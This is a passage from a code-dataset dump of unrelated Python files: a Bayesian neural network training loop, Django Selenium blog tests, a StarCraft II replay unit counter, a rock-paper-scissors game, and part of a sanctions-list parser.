for j in range(TEST_BATCH_SIZE):\n mydata_means[j] /= np.sum(mydata_means[j])\n else:\n tmp = sigmoid(outputs[i].detach().cpu().numpy())\n for j in range(TEST_BATCH_SIZE):\n tmp[j] /= 
np.sum(tmp[j])\n # print(sum(tmp[j]))\n mydata_means = mydata_means + tmp\n if (i == 0):\n mydata_means_med = sigmoid(outputs[i + 10].detach().cpu().numpy())\n for j in range(TEST_BATCH_SIZE):\n mydata_means_med[j] /= np.sum(mydata_means_med[j])\n else:\n tmp = sigmoid(outputs[i + 10].detach().cpu().numpy())\n for j in range(TEST_BATCH_SIZE):\n tmp[j] /= np.sum(tmp[j])\n # print(sum(tmp[j]))\n mydata_means_med = mydata_means_med + tmp\n mydata_means /= TEST_SAMPLES\n mydata_means_med /= TEST_SAMPLES\n\n outputs[TEST_SAMPLES + 11] = net(data, sample=False, medimean=True,\n g1=(net.l1.alpha.data > 0.5).type(torch.cuda.FloatTensor).to(DEVICE),\n g2=(net.l2.alpha.data > 0.5).type(torch.cuda.FloatTensor).to(DEVICE),\n g3=(net.l3.alpha.data > 0.5).type(torch.cuda.FloatTensor).to(DEVICE))\n outputs[TEST_SAMPLES + 10] = net(data, sample=False, medimean=False, g1=net.l1.gamma.rsample(),\n g2=net.l2.gamma.rsample(), g3=net.l3.gamma.rsample())\n\n output1 = outputs[0:9].mean(0)\n output2 = outputs[10:19].mean(0)\n\n preds = outputs.max(2, keepdim=True)[1]\n pred1 = output1.max(1, keepdim=True)[1] # index of max log-probability\n pred2 = output2.max(1, keepdim=True)[1]\n\n if cases3 == 0:\n cases3 += 1\n if cases4 == 0:\n cases4 += 1\n\n #print(output1)\n #print(pred1)\n #print(target.view_as(pred2))\n\n corrects += preds.eq(target.view_as(pred1)).sum(dim=1).squeeze().cpu().numpy()\n correct1 += pred1.eq(target.view_as(pred1)).sum().item()\n correct2 += pred2.eq(target.view_as(pred2)).sum().item()\n\n # print(mydata_means[1][1])\n for jj in range(TEST_BATCH_SIZE):\n if mydata_means[jj][pred1.detach().cpu().numpy()[jj]] >= 0.95:\n correct3 += pred1[jj].eq(target.view_as(pred1)[jj]).sum().item()\n cases3 += 1\n\n if mydata_means_med[jj][pred2.detach().cpu().numpy()[jj]] >= 0.95:\n correct4 += pred2[jj].eq(target.view_as(pred2)[jj]).sum().item()\n cases4 += 1\n\n for index, num in enumerate(corrects):\n if index < TEST_SAMPLES:\n print('Component {} Accuracy: {}/{}'.format(index, num, TEST_SIZE))\n elif index < TEST_SAMPLES + 10:\n print('Component MPM {} Accuracy: {}/{}'.format(index, num, TEST_SIZE))\n elif index == TEST_SAMPLES + 10:\n print('Posterior Mode Accuracy: {}/{}'.format(num, TEST_SIZE))\n elif index == TEST_SAMPLES + 11:\n print('Posterior Mean Accuracy: {}/{}'.format(num, TEST_SIZE))\n elif index == TEST_SAMPLES + 12:\n print('Posterior MPM Mean Accuracy: {}/{}'.format(num, TEST_SIZE))\n\n print('Ensemble Accuracy: {}/{}'.format(correct1, TEST_SIZE))\n print('Median Ensemble Accuracy: {}/{}'.format(correct2, TEST_SIZE))\n\n corrects = np.append(corrects, correct1)\n corrects = np.append(corrects, correct2)\n\n corrects = np.append(corrects, correct3 / cases3)\n corrects = np.append(corrects, cases3)\n corrects = np.append(corrects, correct4 / cases4)\n corrects = np.append(corrects, cases4)\n\n ps = ((np.sum(gt1 > 0) + np.sum(gt2 > 0) + np.sum(gt3 > 0)) / (5 * 600 + 400 * 600 + 400 * 256)) / 10\n print(spars / ctr)\n\n corrects = np.append(corrects, ps)\n corrects = np.append(corrects, np.median(spars) / ctr)\n return corrects\n\n\ndef cdf(x, plot=True, *args, **kwargs):\n x = sorted(x)\n y = np.arange(len(x)) / len(x)\n return plt.plot(x, y, *args, **kwargs) if plot else (x, y)\n\n\ndef sigmoid(x):\n return (1 / (1 + np.exp(-x)))\n\npepochs = 50\n\n\ndef ptrain(net, optimizer, epoch, i, batch_size = BATCH_SIZE):\n net.train()\n if epoch == 0: # write initial distributions\n # write_weight_histograms(epoch,i)\n net.l1.model_mu.requires_grad = False\n net.l2.model_mu.requires_grad = False\n 
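# NOTE: the requires_grad = False block here freezes the structural and
# prior hyperparameters (model_*, weight_a/b, bias_a/b, pa/pb) so that this
# post-training phase refines only the weight and bias posteriors.
# Separately, torch.autograd.Variable, used in the data-loading lines below,
# has been a no-op wrapper since PyTorch 0.4; an equivalent modern sketch:
#
#     data = torch.as_tensor(_x, dtype=torch.float32, device=DEVICE)
#     target = torch.as_tensor(_y, dtype=torch.long, device=DEVICE).squeeze(1)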
net.l3.model_mu.requires_grad = False\n net.l1.model_sigma.requires_grad = False\n net.l2.model_sigma.requires_grad = False\n net.l3.model_sigma.requires_grad = False\n net.l1.weight_a.requires_grad = False\n net.l2.weight_a.requires_grad = False\n net.l3.weight_a.requires_grad = False\n net.l1.weight_b.requires_grad = False\n net.l2.weight_b.requires_grad = False\n net.l3.weight_b.requires_grad = False\n net.l1.bias_a.requires_grad = False\n net.l2.bias_a.requires_grad = False\n net.l3.bias_a.requires_grad = False\n net.l1.bias_b.requires_grad = False\n net.l2.bias_b.requires_grad = False\n net.l3.bias_b.requires_grad = False\n net.l1.pa.requires_grad = False\n net.l2.pa.requires_grad = False\n net.l3.pa.requires_grad = False\n net.l1.pb.requires_grad = False\n net.l2.pb.requires_grad = False\n net.l3.pb.requires_grad = False\n old_batch = 0\n for batch in range(int(np.ceil(dtrain.shape[0] / batch_size))):\n batch = (batch + 1)\n _x = dtrain[old_batch: batch_size * batch, 0:256]\n _y = dtrain[old_batch: batch_size * batch, 256:257]\n\n data = Variable(torch.FloatTensor(_x)).cuda()\n target = Variable(torch.transpose(torch.LongTensor(_y), 0, 1).cuda())[0]\n\n old_batch = batch_size * batch\n net.zero_grad()\n\n loss, log_prior, log_variational_posterior, negative_log_likelihood = net.sample_elbo(data, target)\n\n loss.backward(retain_graph=True)\n\n if COND_OPT:\n net.l1.weight_mu.grad = net.l1.weight_mu.grad * net.l1.gammas.data\n net.l2.weight_mu.grad = net.l2.weight_mu.grad * net.l2.gammas.data\n net.l3.weight_mu.grad = net.l3.weight_mu.grad * net.l3.gammas.data\n\n optimizer.step()\n write_loss_scalars(epoch, i, batch, loss, log_prior, log_variational_posterior, negative_log_likelihood)\n print(epoch + 1)\n print(loss)\n print(negative_log_likelihood)\n print(net.l1.alpha.cpu().detach().numpy().mean())\n print(net.l2.alpha.cpu().detach().numpy().mean())\n print(net.l3.alpha.cpu().detach().numpy().mean())\n # write_weight_histograms(epoch+1,i)\n\n\nprint(\"Classes loaded\")\n\nepochs=250\n# make inference on 10 networks\nfor i in range(0, 10):\n print(i)\n torch.manual_seed(i)\n net = BayesianNetwork().to(DEVICE)\n optimizer = optim.Adam([\n {'params': net.l1.bias_mu, 'lr': 0.0001},\n {'params': net.l2.bias_mu, 'lr': 0.0001},\n {'params': net.l3.bias_mu, 'lr': 0.0001},\n {'params': net.l1.bias_rho, 'lr': 0.0001},\n {'params': net.l2.bias_rho, 'lr': 0.0001},\n {'params': net.l3.bias_rho, 'lr': 0.0001},\n {'params': net.l1.weight_mu, 'lr': 0.0001},\n {'params': net.l2.weight_mu, 'lr': 0.0001},\n {'params': net.l3.weight_mu, 'lr': 0.0001},\n {'params': net.l1.weight_rho, 'lr': 0.0001},\n {'params': net.l2.weight_rho, 'lr': 0.0001},\n {'params': net.l3.weight_rho, 'lr': 0.0001},\n {'params': net.l1.model_mu, 'lr': 0.01},\n {'params': net.l2.model_mu, 'lr': 0.01},\n {'params': net.l3.model_mu, 'lr': 0.01},\n {'params': net.l1.model_fact, 'lr': 0.01},\n {'params': net.l2.model_fact, 'lr': 0.01},\n {'params': net.l3.model_fact, 'lr': 0.01},\n {'params': net.l1.model_sigma, 'lr': 0.01},\n {'params': net.l2.model_sigma, 'lr': 0.01},\n {'params': net.l3.model_sigma, 'lr': 0.01},\n {'params': net.l1.weight_a, 'lr': 0.00001},\n {'params': net.l2.weight_a, 'lr': 0.00001},\n {'params': net.l3.weight_a, 'lr': 0.00001},\n {'params': net.l1.weight_b, 'lr': 0.00001},\n {'params': net.l2.weight_b, 'lr': 0.00001},\n {'params': net.l3.weight_b, 'lr': 0.00001},\n {'params': net.l1.bias_a, 'lr': 0.00001},\n {'params': net.l2.bias_a, 'lr': 0.00001},\n {'params': net.l3.bias_a, 'lr': 0.00001},\n {'params': 
net.l1.bias_b, 'lr': 0.00001},\n {'params': net.l2.bias_b, 'lr': 0.00001},\n {'params': net.l3.bias_b, 'lr': 0.00001},\n {'params': net.l1.pa, 'lr': 0.001},\n {'params': net.l2.pa, 'lr': 0.001},\n {'params': net.l3.pa, 'lr': 0.001},\n {'params': net.l1.pb, 'lr': 0.001},\n {'params': net.l2.pb, 'lr': 0.001},\n {'params': net.l3.pb, 'lr': 0.001}\n ], lr=0.0001)\n for epoch in range(epochs):\n if (net.l1.pa / (net.l1.pa + net.l1.pb)).mean() < 0.1 or epoch == 20:\n print(epoch)\n net.l1.gamma_prior.exact = True\n net.l2.gamma_prior.exact = True\n net.l3.gamma_prior.exact = True\n net.l1.bias_prior.exact = True\n net.l2.bias_prior.exact = True\n net.l3.bias_prior.exact = True\n net.l1.weight_prior.exact = True\n net.l1.weight_prior.exact = True\n net.l1.weight_prior.exact = True\n # res = test_ensemble(net)\n # res = np.append(res,net.l1.alpha.cpu().detach().numpy().mean())\n # res = np.append(res,net.l2.alpha.cpu().detach().numpy().mean())\n # res = np.append(res,net.l3.alpha.cpu().detach().numpy().mean())\n # np.savetxt(\"fmaccuracieshalf_\"+str(i)+\".csv\", res, delimiter=\",\")\n optimizer = optim.Adam([\n {'params': net.l1.bias_mu, 'lr': 0.0001},\n {'params': net.l2.bias_mu, 'lr': 0.0001},\n {'params': net.l3.bias_mu, 'lr': 0.0001},\n {'params': net.l1.bias_rho, 'lr': 0.0001},\n {'params': net.l2.bias_rho, 'lr': 0.0001},\n {'params': net.l3.bias_rho, 'lr': 0.0001},\n {'params': net.l1.weight_mu, 'lr': 0.0001},\n {'params': net.l2.weight_mu, 'lr': 0.0001},\n {'params': net.l3.weight_mu, 'lr': 0.0001},\n {'params': net.l1.weight_rho, 'lr': 0.0001},\n {'params': net.l2.weight_rho, 'lr': 0.0001},\n {'params': net.l3.weight_rho, 'lr': 0.0001},\n {'params': net.l1.model_mu, 'lr': 0.0001},\n {'params': net.l2.model_mu, 'lr': 0.0001},\n {'params': net.l3.model_mu, 'lr': 0.0001},\n {'params': net.l1.model_fact, 'lr': 0.0001},\n {'params': net.l2.model_fact, 'lr': 0.0001},\n {'params': net.l3.model_fact, 'lr': 0.0001},\n {'params': net.l1.model_sigma, 'lr': 0.0001},\n {'params': net.l2.model_sigma, 'lr': 0.0001},\n {'params': net.l3.model_sigma, 'lr': 0.0001},\n {'params': net.l1.weight_a, 'lr': 0.00},\n {'params': net.l2.weight_a, 'lr': 0.00},\n {'params': net.l3.weight_a, 'lr': 0.00},\n {'params': net.l1.weight_b, 'lr': 0.00},\n {'params': net.l2.weight_b, 'lr': 0.00},\n {'params': net.l3.weight_b, 'lr': 0.00},\n {'params': net.l1.bias_a, 'lr': 0.00},\n {'params': net.l2.bias_a, 'lr': 0.00},\n {'params': net.l3.bias_a, 'lr': 0.00},\n {'params': net.l1.bias_b, 'lr': 0.00},\n {'params': net.l2.bias_b, 'lr': 0.00},\n {'params': net.l3.bias_b, 'lr': 0.00},\n {'params': net.l1.pa, 'lr': 0.000},\n {'params': net.l2.pa, 'lr': 0.000},\n {'params': net.l3.pa, 'lr': 0.000},\n {'params': net.l1.pb, 'lr': 0.000},\n {'params': net.l2.pb, 'lr': 0.000},\n {'params': net.l3.pb, 'lr': 0.000}\n ], lr=0.0001)\n train(net, optimizer, epoch, i)\n print(net.l1.lambdaD.mean.cpu().detach().numpy().mean())\n print(net.l1.model_mu.cpu().detach().numpy().mean())\n print(net.l2.model_mu.cpu().detach().numpy().mean())\n print(net.l3.model_mu.cpu().detach().numpy().mean())\n print(net.l1.model_sigma.cpu().detach().numpy().mean())\n print(net.l2.model_sigma.cpu().detach().numpy().mean())\n print(net.l3.model_sigma.cpu().detach().numpy().mean())\n print(net.l1.alpha.cpu().detach().numpy().mean())\n print(net.l2.alpha.cpu().detach().numpy().mean())\n print(net.l3.alpha.cpu().detach().numpy().mean())\n print((net.l1.pa / (net.l1.pa + net.l1.pb)).mean())\n print((net.l2.pa / (net.l2.pa + net.l2.pb)).mean())\n print((net.l3.pa / 
(net.l3.pa + net.l3.pb)).mean())\n\n net.l1.lambdal = net.l1.lambdaD.rsample().to(DEVICE)\n net.l2.lambdal = net.l2.lambdaD.rsample().to(DEVICE)\n net.l3.lambdal = net.l3.lambdaD.rsample().to(DEVICE)\n net.l1.alpha.data = probit(\n net.l1.lambdal) # 1/(1+torch.exp(-net.l1.lambdal.data))#(torch.clamp(self.l1.alpha.data,1e-8 , 1-1e-8))\n net.l2.alpha.data = probit(\n net.l2.lambdal) # 1/(1+torch.exp(-net.l2.lambdal.data))#(torch.clamp(self.l2.alpha.data,1e-8 , 1-1e-8))\n net.l3.alpha.data = probit(\n net.l3.lambdal) # 1/(1+torch.exp(-net.l3.lambdal.data))#(torch.clamp(self.l3.alpha.data,1e-8 , 1-1e-8))\n net.l1.gamma.alpha.data = probit(\n net.l1.lambdal) # 1/(1+torch.exp(-net.l1.lambdal.data))#(torch.clamp(self.l1.alpha.data,1e-8 , 1-1e-8))\n net.l2.gamma.alpha.data = probit(\n net.l2.lambdal) # 1/(1+torch.exp(-net.l2.lambdal.data))#(torch.clamp(self.l2.alpha.data,1e-8 , 1-1e-8))\n net.l3.gamma.alpha.data = probit(\n net.l3.lambdal) # 1/(1+torch.exp(-net.l3.lambdal.data))#(torch.clamp(self.l3.alpha.data,1e-8 , 1-1e-8))\n\n net.l1.gamma.exact = True\n net.l2.gamma.exact = True\n net.l3.gamma.exact = True\n\n res = test_ensemble(net)\n\n os = (torch.sum(net.l1.alpha.data > 0.5).cpu().detach().numpy() + torch.sum(\n net.l2.alpha.data > 0.5).cpu().detach().numpy() + torch.sum(net.l3.alpha.data > 0.5).cpu().detach().numpy()) / (\n 5 * 600 + 400 * 600 + 400 * 256)\n\n res = np.append(res, os)\n\n res = np.append(res, net.l1.alpha.cpu().detach().numpy().mean())\n res = np.append(res, net.l2.alpha.cpu().detach().numpy().mean())\n res = np.append(res, net.l3.alpha.cpu().detach().numpy().mean())\n\n np.savetxt(\"low_factor_gaussmaccuracies_\" + prefix + str(i) + \".csv\", res, delimiter=\",\")\n\n print(net.l1.alpha.cpu().detach().numpy().mean())\n print(net.l2.alpha.cpu().detach().numpy().mean())\n print(net.l3.alpha.cpu().detach().numpy().mean())\n\n plt.hist(net.l3.gamma.alpha.data.view(-1).cpu().detach().numpy(), bins=1000)\n plt.show()\n plt.hist(net.l1.alpha.view(-1).cpu().detach().numpy(), bins=1000)\n plt.show()\n plt.hist(net.l2.alpha.view(-1).cpu().detach().numpy(), bins=1000)\n plt.show()\n plt.hist(net.l3.alpha.view(-1).cpu().detach().numpy(), bins=1000)\n plt.show()\n\n\n torch.save(net.state_dict(), \"fgauusm\" + prefix + str(i) + \".par\")\n # pepochs = 1\n for epoch in range(pepochs):\n ptrain(net, optimizer, epoch, i)\n res = test_ensemble(net)\n np.savetxt(\"ptlow_factor_gaussmmaccuracies_\"+ prefix + str(i) + \".csv\", res, delimiter=\",\")\n torch.save(net.state_dict(), \"low_factor_gaussfmp\"+prefix+ str(i) + \".par\")","sub_path":"PHONEMNE/LBBNN-GP-LFMVN-PHONEMNE.py","file_name":"LBBNN-GP-LFMVN-PHONEMNE.py","file_ext":"py","file_size_in_byte":35158,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"116731839","text":"import datetime\nfrom selenium import webdriver\n\nfrom django.test import LiveServerTestCase\nfrom django.contrib.auth.models import User\nfrom django.utils.dateformat import DateFormat\n\n\nclass AdminEntriesTest(LiveServerTestCase):\n\n\tdef setUp(self):\n\t\tself.admin_user = User.objects.create_superuser(\n\t\t\tusername='kyle',\n\t\t\tpassword='saqhouse',\n\t\t\temail='thefantasygeeks11@gmail.com'\n\t\t)\n\t\tself.today = DateFormat(datetime.date.today()).format('N d, Y')\n\n\t\tself.browser = webdriver.Firefox()\n\t\tself.browser.implicitly_wait(3)\n\n\tdef tearDown(self):\n\t\tself.browser.quit()\n\n\tdef test_admin_can_create_new_blog_entry(self):\n\t\t# Kyle decides to write a new blog post to help 
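# NOTE on the LBBNN script that ends above: probit(x) there is the standard
# normal CDF (torch.distributions.Normal(0, 1).cdf), mapping the sampled
# lambdal values to inclusion probabilities alpha in (0, 1);
# torch.special.ndtr(x) computes the same quantity. Restoring a saved run
# follows the usual state_dict pattern, e.g. for the files written with
# prefix "_lf_phoneme_":
#
#     net2 = BayesianNetwork().to(DEVICE)
#     net2.load_state_dict(torch.load("fgauusm_lf_phoneme_0.par"))
#     net2.eval()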
market The\n\t\t# Fantasy Geeks. He navigates to the admin interface\n\t\tself.browser.get('%s%s' % (self.live_server_url, '/admin/'))\n\n\t\t# He fills in his username and password when prompted and\n\t\t# clicks 'Log in' to continue to the admin interface\n\t\tusername_input = self.browser.find_element_by_id('id_username')\n\t\tusername_input.send_keys('kyle')\n\t\tpassword_input = self.browser.find_element_by_id('id_password')\n\t\tpassword_input.send_keys('saqhouse')\n\t\tlogin_button = self.browser.find_element_by_xpath(\n\t\t\t'//input[@value=\"Log in\"]'\n\t\t)\n\t\tlogin_button.click()\n\n\t\t# He then clicks on the '+Add' button next to the Entrys link\n\t\t# to go to the Add Entry page\n\t\tadd_entry_button = self.browser.find_element_by_xpath(\n\t\t\t'//a[@href=\"%s\"]' % '/admin/blog/entry/add/'\n\t\t)\n\t\tadd_entry_button.click()\n\n\t\t# Kyle fills in the Entry's title, content, and puts his own\n\t\t# name in as Author\n\t\ttitle_input = self.browser.find_element_by_id('id_title')\n\t\ttitle_input.send_keys('First Blog Post')\n\t\tauthor_field = self.browser.find_element_by_id('id_author')\n\t\tauthor_field.send_keys('Kyle Swartz')\n\t\tbody_input = self.browser.find_element_by_id('id_body')\n\t\tbody_input.send_keys('This is some blog content.')\n\n\t\t# He clicks the 'Save' button to save the Entry and is taken to\n\t\t# a new page that displays saved Entries\n\t\tsave_button = self.browser.find_element_by_name('_save')\n\t\tsave_button.click()\n\n\t\t# The title and publication date of each Entry is displayed\n\t\ttable = self.browser.find_element_by_id('result_list')\n\t\ttitles = table.find_elements_by_css_selector('th.field-title')\n\t\tpub_dates = table.find_elements_by_css_selector(\n\t\t\t'td.field-published_date'\n\t\t)\n\n\t\tself.assertIn('First Blog Post', [title.text for title in titles])\n\t\tself.assertIn(self.today, [date.text for date in pub_dates])\n\n\t\t# Kyle notices that the number of entiries is also displayed\n\t\tnum_entries = self.browser.find_element_by_css_selector('p.paginator')\n\t\tself.assertEqual('1 entry', num_entries.text)\n\n\t\t# Kyle decides to create another entry. He clicks the 'Add\n\t\t# entry +' button is taken back to the Add Entry page\n\t\tself.browser.find_element_by_link_text('Add entry').click()\n\n\t\t# He again enters the blog title and content and signs himself\n\t\t# as Author\n\t\ttitle_input = self.browser.find_element_by_id('id_title')\n\t\ttitle_input.send_keys('Second Blog Post')\n\t\tauthor_field = self.browser.find_element_by_id('id_author')\n\t\tauthor_field.send_keys('Kyle Swartz')\n\t\tbody_input = self.browser.find_element_by_id('id_body')\n\t\tbody_input.send_keys('This is some other blog content.')\n\n\t\t# He clicks the 'Save' button and again is taken back to the\n\t\t# Entries page. 
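# NOTE: the find_element_by_* / find_elements_by_* helpers used throughout
# these tests are the Selenium 3 API; they were deprecated in Selenium 4.0
# and removed in 4.3. A hedged equivalent for current Selenium versions:
#
#     from selenium.webdriver.common.by import By
#     username_input = self.browser.find_element(By.ID, 'id_username')
#     save_button = self.browser.find_element(By.NAME, '_save')
#     titles = table.find_elements(By.CSS_SELECTOR, 'th.field-title')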
He is happy to see that both of his Blog\n\t\t# Entries now show up\n\t\tsave_button = self.browser.find_element_by_name('_save')\n\t\tsave_button.click()\n\n\t\ttable = self.browser.find_element_by_id('result_list')\n\t\ttitles = table.find_elements_by_css_selector('th.field-title')\n\t\tpub_dates = table.find_elements_by_css_selector(\n\t\t\t'td.field-published_date'\n\t\t)\n\n\t\tself.assertIn('First Blog Post', [title.text for title in titles])\n\t\tself.assertIn('Second Blog Post', [title.text for title in titles])\n\t\tself.assertIn(self.today, [date.text for date in pub_dates])\n\t\tself.assertIn(self.today, [date.text for date in pub_dates])\n\n\t\t# Kyle also sees that the number entries has also incremented\n\t\t# and the entries are conveniently sorted in reverse order of\n\t\t# publication\n\t\tnum_entries = self.browser.find_element_by_css_selector('p.paginator')\n\t\tself.assertEqual('2 entries', num_entries.text)\n\t\tself.assertEqual('Second Blog Post', titles[0].text)\n\n\nclass NewVisitorTest(LiveServerTestCase):\n\n\tdef setUp(self):\n\t\tself.browser = webdriver.Firefox()\n\t\tself.browser.implicitly_wait(3)\n\n\tdef tearDown(self):\n\t\tself.browser.quit()\n\n\tdef test_can_see_list_of_posts_and_go_to_full_post(self):\n\t\t# Joe hears about TheFantasyGeeks when Kyle posts a link to\n\t\t# the blog on reddit. He follows the link to the homepage.\n\t\tself.browser.get(self.live_server_url)\n\n\t\t# He notices the tab title displays the site name\n\t\tself.assertIn('The Fantasy Geeks', self.browser.title)\n\n\t\t# He also notices the site name and tag line are displayed\n\t\t# prominently on the page\n\t\theader_text = self.browser.find_element_by_tag_name('h1').text\n\t\tself.assertEqual(header_text, 'The Fantasy Geeks')\n\t\ttag_line = self.browser.find_element_by_tag_name('h2').text\n\t\tself.assertEqual(tag_line, 'Placeholder for Catchy Tagline')\n\n\t\t# Joe sees a list of recent blog posts on the page notices that\n\t\t# each post shows the title, author and publication date\n\n\t\t# Joe is happy to see he can read a preview of each post before\n\t\t# deciding which to read\n\n\t\t# Scrolling down the page he notices that the most recent posts\n\t\t# were at the top of the page\n\n\t\t# When he reaches the bottom of the page he sees that only the\n\t\t# 10 most recent posts are displayed, but he sees a button\n\t\t# inviting him to see older posts\n\n\t\t# Joes sees a post that intrigues him and clicks on the post\n\t\t# title. 
He is taken to the full Blog post page\n\t\tself.fail('Finish the test!')\n","sub_path":"functional_tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":5721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"} +{"seq_id":"618204672","text":"import sc2reader\nimport json\nimport pprint\nimport math\nfrom datetime import timedelta\n\nreplay_dir = '' ## fill in your replay dir\nreplay_file = replay_dir + 'Ever Dream LE (101).SC2Replay'\n# replay_file = replay_dir + 'b-to-gm-on-time.SC2Replay'\n\nreplay = sc2reader.load_replay(replay_file)\npp = pprint.PrettyPrinter(indent=4)\n\nprint(replay.game_length)\nprint(replay.expansion)\n\nevents_to_exclude = [\n 'CameraEvent',\n 'TargetPointCommandEvent',\n 'SelectionEvent',\n 'GetControlGroupEvent',\n 'SetControlGroupEvent',\n 'TargetUnitCommandEvent'\n]\n\nevents_to_include = [\n 'UnitBornEvent',\n 'UnitDiedEvent',\n 'UnitInitEvent',\n 'UnitDoneEvent'\n]\n\ndummy_objects = [\n 'Beacon',\n 'MineralField',\n 'PurifierMineralField',\n 'VespeneGeyser',\n 'RichVespeneGeyser',\n 'DestructibleRock',\n 'ShakurasVespeneGeyser',\n 'UnbuildableBricksDestructible',\n 'ProtossVespeneGeyser',\n 'KarakMale',\n 'UnbuildablePlatesDestructible',\n 'XelNagaTower',\n 'KarakFemale'\n]\n\ndef shouldFilter(event):\n type_name = event.get('unit_type_name', None)\n if (type_name != None):\n for dummy in dummy_objects:\n if (type_name.startswith(dummy)):\n return True\n return False\n\nunits_by_user = dict()\nunits_that_died = set()\nunits_building = set()\ngame_time = []\nlast_printed = []\n\ndef pretty_game_time():\n total_seconds = game_time[0]\n delta = timedelta(seconds = total_seconds)\n return str(delta)\n\ndef print_current_state():\n print('')\n print(pretty_game_time())\n for user in units_by_user.keys():\n units = units_by_user[user]\n units_by_type = dict()\n for unit in units:\n if unit not in units_that_died:\n unit_type = unit.split('[')[0]\n if unit_type not in units_by_type:\n units_by_type[unit_type] = 0\n units_by_type[unit_type] = units_by_type[unit_type] + 1\n print(user)\n print(units_by_type)\n\ndef compute_units():\n count = 0\n for event in replay.events:\n event_info = event.__dict__\n if (event_info['name'] in events_to_exclude):\n continue\n if (event_info['name'] in events_to_include):\n if (not shouldFilter(event_info)):\n # 1.4 appears to be a magic number from \"faster\" game speed\n current_time = math.floor(event_info['second'] / 1.4)\n\n game_time.clear()\n game_time.append(current_time)\n # pp.pprint(event_info)\n\n print(pretty_game_time() + \" \" + event_info['name'] + \" \" + str(event_info['unit']))\n\n if (event_info['name'] == 'UnitDiedEvent'):\n units_that_died.add(str(event_info['unit']))\n if (event_info['name'] == 'UnitDoneEvent'):\n units_building.remove(str(event_info['unit']))\n\n user = event_info.get('unit_controller', None)\n if (user is None):\n continue\n if user not in units_by_user.keys():\n units_by_user[user] = set()\n if (event_info['name'] == 'UnitBornEvent'):\n units_by_user[user].add(str(event_info['unit']))\n if (event_info['name'] == 'UnitInitEvent'):\n units_by_user[user].add(str(event_info['unit']))\n units_building.add(str(event_info['unit']))\n count = count + 1\n\n if (len(last_printed) == 0):\n print_current_state()\n last_printed.append(current_time)\n else:\n last_time = last_printed[0]\n if (current_time - last_time >= 20):\n print_current_state()\n last_printed.clear()\n last_printed.append(current_time)\n\n# for event in replay.events:\n# 
event_info = event.__dict__\n#         if ('Spawning' in pp.pformat(event_info)):\n#             pp.pprint(event_info)\n\ncompute_units()","sub_path":"replays.py","file_name":"replays.py","file_ext":"py","file_size_in_byte":4053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"170300448","text":"# could `import random`, or just import randint directly as done here\nfrom random import randint\nplayer_score = 0\ncomputer_score = 0\nwinning_score = 3\n\nwhile player_score < winning_score and computer_score < winning_score :\n\tprint(f\"Player score {player_score} Computer score {computer_score}\")\n\tprint(\"....rock....\")\n\tprint(\"....paper....\")\n\tprint(\"....scissors....\")\n\n\tplayer = input(\"Player, enter your choice :\").lower()\n\n\tran_num = randint(0,2)\n\tif ran_num == 0:\n\t\tcomputer = \"rock\"\n\telif ran_num == 1:\n\t\tcomputer = \"paper\"\n\telse :\n\t\tcomputer = \"scissors\"\n\tprint(f\"Computer plays {computer}\")\n\n\tif player == computer :\n\t\tprint(\"It's a Tie!!\")\n\n\telif player == \"rock\": \n\t\tif computer ==\"paper\":\n\t\t\tprint(\"Computer wins\")\n\t\t\tcomputer_score +=1\n\t\telif computer ==\"scissors\":\n\t\t\tprint(\"Player one wins\")\n\t\t\tplayer_score += 1\n\n\telif player == \"paper\": \n\t\tif computer ==\"rock\":\n\t\t\tprint(\"Player one wins\")\n\t\t\tplayer_score += 1\n\t\telif computer ==\"scissors\":\n\t\t\tprint(\"Computer wins\")\n\t\t\tcomputer_score +=1\n\n\telif player == \"scissors\":\n\t\tif computer ==\"paper\":\n\t\t\tprint(\"Player one wins\")\n\t\t\tplayer_score += 1\n\t\telif computer ==\"rock\":\n\t\t\tprint(\"Computer wins\")\n\t\t\tcomputer_score +=1\n\n\telse:\n\t\tprint(\"Invalid Choice\")\n\nif player_score > computer_score:\n\tprint(\"Player wins, yeepiee!!\")\nelif player_score == computer_score:\n\tprint(\"It's a Tie\")\nelse:\n\tprint(\"Oh no, Computer won the war!!\")\n","sub_path":"4_Games/rps_v2.py","file_name":"rps_v2.py","file_ext":"py","file_size_in_byte":1333,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"67"}
+{"seq_id":"391382327","text":"from collections import defaultdict\nfrom pprint import pprint  # noqa\n\nfrom normality import stringify\nfrom memorious.helpers import parse_date\nimport csv\n\nfrom opensanctions.models import Entity, Identifier\n\n\nENTITY_TYPES = {\n    'Individual': Entity.TYPE_INDIVIDUAL,\n    'Entity': Entity.TYPE_ENTITY,\n}\n\n\ndef fresh_value(seen, row, key):\n    value = row.get(key)\n    if value is None:\n        return False\n    if key not in seen or value in seen[key]:\n        seen[key].add(value)\n        return True\n    return False\n\n\n
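# NB: as written, fresh_value() returns True for the first value seen under a key\n# and for exact repeats of it, but False for a later, different value; if \"fresh\"\n# is meant as \"not seen before\", the membership test would be \"value not in seen[key]\".\n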
def parse_entry(context, data):\n    group = data.get('group')\n    rows = data.get('rows')\n    seen = defaultdict(set)\n    entity = Entity.create('gb-hmt-sanctions', group)\n    for row in rows:\n        entity.type = ENTITY_TYPES[row.pop('Group Type')]\n        names = (row.pop('Name 1'), row.pop('Name 2'), row.pop('Name 3'),\n                 row.pop('Name 4'), row.pop('Name 5'), row.pop('Name 6'))\n        names = [n for n in names if len(n) > 0]\n        row['_name'] = ' '.join(names)\n\n        if fresh_value(seen, row, '_name'):\n            name = entity\n            if entity.name is not None:\n                name = entity.create_alias()\n            name.type = row.get('Alias Type')\n            name.title = row.get('Title')\n            name.last_name = names.pop()\n            if len(names):\n                name.first_name = names.pop(0)\n            if len(names):\n                name.second_name = names.pop(0)\n            if len(names):\n                name.third_name = ' '.join(names)\n\n        if row.get('Regime'):\n            entity.program = row.pop('Regime')\n        if row.get('Position'):\n            entity.function = row.pop('Position')\n        if row.get('Other Information'):\n            entity.summary = row.pop('Other Information')\n        if row.get('Last Updated'):\n            entity.updated_at = row.pop('Last Updated')\n\n        if fresh_value(seen, row, 'DOB'):\n            dob_text = row.get('DOB')\n            if dob_text is None or not len(dob_text.strip()):\n                continue\n            dob = parse_date(dob_text)\n            if dob is None and '/' in dob_text:\n                _, dob = dob_text.rsplit('/', 1)\n            birth_date 